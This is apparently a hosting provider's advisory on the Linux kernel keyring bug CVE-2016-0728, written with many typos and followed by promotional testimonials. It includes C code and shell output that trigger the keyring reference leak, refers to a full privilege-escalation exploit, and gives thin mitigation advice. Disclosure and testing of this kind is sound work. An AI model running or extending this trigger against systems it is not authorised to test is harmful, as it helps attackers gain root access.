New Linux Kernel Zero day Exploit Vulnerability CVE-2016-0728

New Linux Kernel Zero day Exploit Vulnerability CVE-2016-0728

The PPR research team recently found a 0-day local privillege escalation vulnerability in the linux kernel. This vulnerability has existed since 2012. This bug is cased buy a reference leak in the keyrings facility.

We already performed mitigation procedures in our proactive clients servers. If you don’t have a proactive management plan, please contact us asap

How to test My Kernel?

You can use the following C code to test it.

/* $ gcc leak.c -o leak -lkeyutils -Wall */
/* $ ./leak */
/* $ cat /proc/keys */

#include 
#include 
#include 
#include 

int main(int argc, const char *argv[])
{
    int i = 0;
    key_serial_t serial;

    serial = keyctl(KEYCTL_JOIN_SESSION_KEYRING, "leaked-keyring");
    if (serial < 0) {
        perror("keyctl");
        return -1;
    }

    if (keyctl(KEYCTL_SETPERM, serial, KEY_POS_ALL | KEY_USR_ALL) < 0) {
        perror("keyctl");
        return -1;
    }

    for (i = 0; i < 100; i++) {
        serial = keyctl(KEYCTL_JOIN_SESSION_KEYRING, "leaked-keyring");
        if (serial < 0) {
            perror("keyctl");
            return -1;
        }
    }

    return 0;
}

It will a sample output like as follows,

@ohome:~$ gcc leak.c -o leak -lkeyutils -Wall
@ohome:~$ cat /proc/keys
@ohome:~$ ./leak
@ohome:~$ cat /proc/keys
3fa2af76 I--Q--- 100 perm 3f3f0000 1000 1000 keyring leaked-keyring: empty

You can download the a full exploit from here. It will take around 30 to 40 minutes to finish the forking. Well as you know time is not an issue in privillege excalation exploit.

Mitigations

This was affected by almost all kernel version(3.x + ) Initially disable the following in sysctl.conf

kptr_restrict=1 

After that upgrade your kernel version. There may be already a patch for the kernel in your OS.

References

1. PPR Research Page

Subscribe Now

10,000 successful online businessmen like to have our content directly delivered to their inbox. Subscribe to our newsletter!

Archive Calendar

Sat Sun Mon Tue Wed Thu Fri
 1
2345678
9101112131415
16171819202122
23242526272829
30  

Over 20000 Satisfied Customers!

From 24/7 support that acts as your extended team to incredibly fast website performance

Zelt staff were fantastic, I had a concern with a domain and they got back to me very quickly and they helped me to resolve the issue!

author
Technician, Diageo PLC

I'm using Zelt for my portfolio since 2006. The transition was seamless, the support was immediate, and everything works perfectly.

author
Photographer, Allister Freeman

Very easy to understand & use even though I am not very technologically minded. No complications whatsoever & I wouldn't hesitate to recommend it to all.

author
Actor, A&J Artists

Zelt support team have been amazingly responsive and helpful to any of my queries, thank you so much to the Zelt have been amazingly responsive and helpful to any of my queries 👍👍👍

author
Technician, Diageo PLC

Anytime I've had a problem I can't solve, I've found Zelt to be diligent and persistent. They simply won't let an issue go until the client is happy.

author
Doctor, SmartClinics

Zelt support team have been amazingly responsive and helpful to any of my queries, thank you so much to the Zelt have been amazingly responsive and helpful to any of my queries 👍👍👍

author
Freelancer, Fiverr

24/7 World-Class Support

Ran into trouble? Contact our Customer Success team any time via live chat or email.

  • Receive professional WordPress support
  • Our specialists are available round
Get Support